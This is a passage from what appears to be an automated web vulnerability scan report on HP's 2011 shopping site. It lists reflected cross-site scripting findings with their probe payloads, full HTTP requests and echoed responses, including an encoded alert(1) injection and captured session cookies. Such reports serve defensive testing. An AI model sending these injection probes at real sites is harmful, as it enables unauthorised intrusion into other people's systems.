s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:30 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224690

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
ni_category == '' || omni_category == 'null')
omni_category = '';
else if(omni_category == 'handhelds')
omni_category = 'ipaqs';

var omni_storeName = 'computer_store326dc';b71c7de3e6a';
if(omni_storeName != 'null' && omni_storeName == 'accessories')
omni_category = 'accessories';

//PVCS Fix #23261
if(omni_storeName != null && omni_storeName == 'com
...[SNIP]...

1.48. http://www.shopping.hp.com/webapp/shopping/product_detail.do [storeName parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the storeName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf6c0"%20a%3db%20ccf25002201 was submitted in the storeName parameter. This input was echoed as cf6c0" a=b ccf25002201 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_storecf6c0"%20a%3db%20ccf25002201&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:26 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=mtLjT6KGYHkh3nxQ47sNsB02TnVRcd2kMSwZ2DRZvTLvQRXyhcLf!-1039217636; expires=Friday, 23-Sep-2011 01:09:27 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:27 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:27 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224770

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<a href="/desktops/p7xt_series/1/computer_storecf6c0" a=b ccf25002201">
...[SNIP]...

1.49. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the subcat1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e422b'%3bbd2c2a0ec7d was submitted in the subcat1 parameter. This input was echoed as e422b';bd2c2a0ec7d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rtse422b'%3bbd2c2a0ec7d&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:18 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:18 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:18 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
// Commented out below lines to remove directLink
var omni_landing = 'desktops';
var omni_category = 'p7xt_series';
var omni_catLevel = '3';
var omni_subcat1 = 'rtse422b';bd2c2a0ec7d';

//Script added to introduce New Omniture Variables
if(omni_landing == null || omni_landing == '' || omni_landing == 'null')
omni_landing = '';
if(omni_category == n
...[SNIP]...

1.50. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the subcat1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b83"%20a%3db%20c0af24b7873 was submitted in the subcat1 parameter. This input was echoed as f3b83" a=b c0af24b7873 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rtsf3b83"%20a%3db%20c0af24b7873&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:12 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:12 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:12 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222667

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
ReadReviewsLink" style="display:none;" href="javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rtsf3b83" a=b c0af24b7873&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');" title="javascript:retrieveURL('htt
...[SNIP]...

1.51. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the subcat1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab48"%3b1751e390864 was submitted in the subcat1 parameter. This input was echoed as 1ab48";1751e390864 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts1ab48"%3b1751e390864&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:15 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:16 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:16 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
readReviewsLink() {
return "javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts1ab48";1751e390864&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');";
}
//-->
...[SNIP]...

1.52. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5cf"%20a%3db%20e97581269ec was submitted in the tab parameter. This input was echoed as 9b5cf" a=b e97581269ec in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /webapp/shopping/product_detail.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 137
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; 